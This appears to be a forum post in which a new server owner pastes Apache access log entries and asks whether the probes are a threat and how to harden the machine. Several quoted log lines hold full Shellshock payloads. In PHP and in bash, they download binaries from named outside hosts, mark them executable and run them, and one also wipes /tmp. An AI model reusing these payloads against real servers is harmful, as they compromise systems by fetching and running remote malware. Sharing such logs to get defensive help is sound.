so after setting up a new server with just ssh (public key only) and a webserver which just serves one index.html I left for the weekend. Logging in on Monday I see this type of thing in my httpd access_logs
5.199.170.44 - - [07/Apr/2015:12:07:48 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 223 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/x/Help1\";''$b = \"http://x5d.su/x/Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
5.199.170.44 - - [07/Apr/2015:12:07:48 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/x/Help1\";''$b = \"http://x5d.su/x/Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
5.199.170.44 - - [07/Apr/2015:12:07:48 +0200] "GET /cgi-mod/index.cgi HTTP/1.0" 404 215 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/x/Help1\";''$b = \"http://x5d.su/x/Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
and
61.160.232.203 - - [07/Apr/2015:02:39:36 +0200] "GET / HTTP/1.1" 200 66 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.232.203:9992/zxzdl -O /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.232.203:9992/zxzdl -O /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
61.160.232.203 - - [07/Apr/2015:02:39:36 +0200] "GET / HTTP/1.1" 200 66 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.232.203:9992/zxzdl -O /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.232.203:9992/zxzdl -O /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
and lots more of the sort. Especially this China.Z guy was very insistent. I basically understand what this is, that they are probing my machine and trying to get info about it (right?) but
- during the weekend, when there should have been no traffic on the machine (as I said, there is nothing running on it) there were about 200mb of outbound traffic
- httpd was restarted during this time, as far as I can tell that shouldn't have happened
- some of these requests returned 200 (the "/" ones for instance), should I be worried?
These two examples are indeed larger tries, with many requests from the same IP, but there are many others with just one request / IP.
So, should I worry about this? I've shut down my apache and also closed the relevant ports in the firewall, but I will need apache running on this machine. Also, is there something I can / should do to prevent this?
Also: this machine is internet-facing and has a fixed IP, I'm guessing that's why I'm getting pounded.
Thanks :)